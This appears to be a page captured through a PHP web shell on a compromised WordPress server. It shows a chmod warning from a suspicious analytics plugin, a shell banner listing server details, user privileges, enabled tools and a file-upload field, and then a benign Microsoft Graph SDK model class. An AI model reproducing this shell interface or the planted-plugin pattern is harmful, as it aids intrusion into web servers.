Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* ApplicationTemplate File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* ApplicationTemplate class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class ApplicationTemplate extends Entity
{
/**
* Gets the categories
* The list of categories for the application. Supported values can be: Collaboration, Business Management, Consumer, Content management, CRM, Data services, Developer services, E-commerce, Education, ERP, Finance, Health, Human resources, IT infrastructure, Mail, Management, Marketing, Media, Productivity, Project management, Telecommunications, Tools, Travel, and Web design & hosting.
*
* @return array|null The categories
*/
public function getCategories()
{
if (array_key_exists("categories", $this->_propDict)) {
return $this->_propDict["categories"];
} else {
return null;
}
}
/**
* Sets the categories
* The list of categories for the application. Supported values can be: Collaboration, Business Management, Consumer, Content management, CRM, Data services, Developer services, E-commerce, Education, ERP, Finance, Health, Human resources, IT infrastructure, Mail, Management, Marketing, Media, Productivity, Project management, Telecommunications, Tools, Travel, and Web design & hosting.
*
* @param string[] $val The categories
*
* @return ApplicationTemplate
*/
public function setCategories($val)
{
$this->_propDict["categories"] = $val;
return $this;
}
/**
* Gets the description
* A description of the application.
*
* @return string|null The description
*/
public function getDescription()
{
if (array_key_exists("description", $this->_propDict)) {
return $this->_propDict["description"];
} else {
return null;
}
}
/**
* Sets the description
* A description of the application.
*
* @param string $val The description
*
* @return ApplicationTemplate
*/
public function setDescription($val)
{
$this->_propDict["description"] = $val;
return $this;
}
/**
* Gets the displayName
* The name of the application.
*
* @return string|null The displayName
*/
public function getDisplayName()
{
if (array_key_exists("displayName", $this->_propDict)) {
return $this->_propDict["displayName"];
} else {
return null;
}
}
/**
* Sets the displayName
* The name of the application.
*
* @param string $val The displayName
*
* @return ApplicationTemplate
*/
public function setDisplayName($val)
{
$this->_propDict["displayName"] = $val;
return $this;
}
/**
* Gets the homePageUrl
* The home page URL of the application.
*
* @return string|null The homePageUrl
*/
public function getHomePageUrl()
{
if (array_key_exists("homePageUrl", $this->_propDict)) {
return $this->_propDict["homePageUrl"];
} else {
return null;
}
}
/**
* Sets the homePageUrl
* The home page URL of the application.
*
* @param string $val The homePageUrl
*
* @return ApplicationTemplate
*/
public function setHomePageUrl($val)
{
$this->_propDict["homePageUrl"] = $val;
return $this;
}
/**
* Gets the logoUrl
* The URL to get the logo for this application.
*
* @return string|null The logoUrl
*/
public function getLogoUrl()
{
if (array_key_exists("logoUrl", $this->_propDict)) {
return $this->_propDict["logoUrl"];
} else {
return null;
}
}
/**
* Sets the logoUrl
* The URL to get the logo for this application.
*
* @param string $val The logoUrl
*
* @return ApplicationTemplate
*/
public function setLogoUrl($val)
{
$this->_propDict["logoUrl"] = $val;
return $this;
}
/**
* Gets the publisher
* The name of the publisher for this application.
*
* @return string|null The publisher
*/
public function getPublisher()
{
if (array_key_exists("publisher", $this->_propDict)) {
return $this->_propDict["publisher"];
} else {
return null;
}
}
/**
* Sets the publisher
* The name of the publisher for this application.
*
* @param string $val The publisher
*
* @return ApplicationTemplate
*/
public function setPublisher($val)
{
$this->_propDict["publisher"] = $val;
return $this;
}
/**
* Gets the supportedProvisioningTypes
* The list of provisioning modes supported by this application. The only valid value is sync.
*
* @return array|null The supportedProvisioningTypes
*/
public function getSupportedProvisioningTypes()
{
if (array_key_exists("supportedProvisioningTypes", $this->_propDict)) {
return $this->_propDict["supportedProvisioningTypes"];
} else {
return null;
}
}
/**
* Sets the supportedProvisioningTypes
* The list of provisioning modes supported by this application. The only valid value is sync.
*
* @param string[] $val The supportedProvisioningTypes
*
* @return ApplicationTemplate
*/
public function setSupportedProvisioningTypes($val)
{
$this->_propDict["supportedProvisioningTypes"] = $val;
return $this;
}
/**
* Gets the supportedSingleSignOnModes
* The list of single sign-on modes supported by this application. The supported values are oidc, password, saml, and notSupported.
*
* @return array|null The supportedSingleSignOnModes
*/
public function getSupportedSingleSignOnModes()
{
if (array_key_exists("supportedSingleSignOnModes", $this->_propDict)) {
return $this->_propDict["supportedSingleSignOnModes"];
} else {
return null;
}
}
/**
* Sets the supportedSingleSignOnModes
* The list of single sign-on modes supported by this application. The supported values are oidc, password, saml, and notSupported.
*
* @param string[] $val The supportedSingleSignOnModes
*
* @return ApplicationTemplate
*/
public function setSupportedSingleSignOnModes($val)
{
$this->_propDict["supportedSingleSignOnModes"] = $val;
return $this;
}
}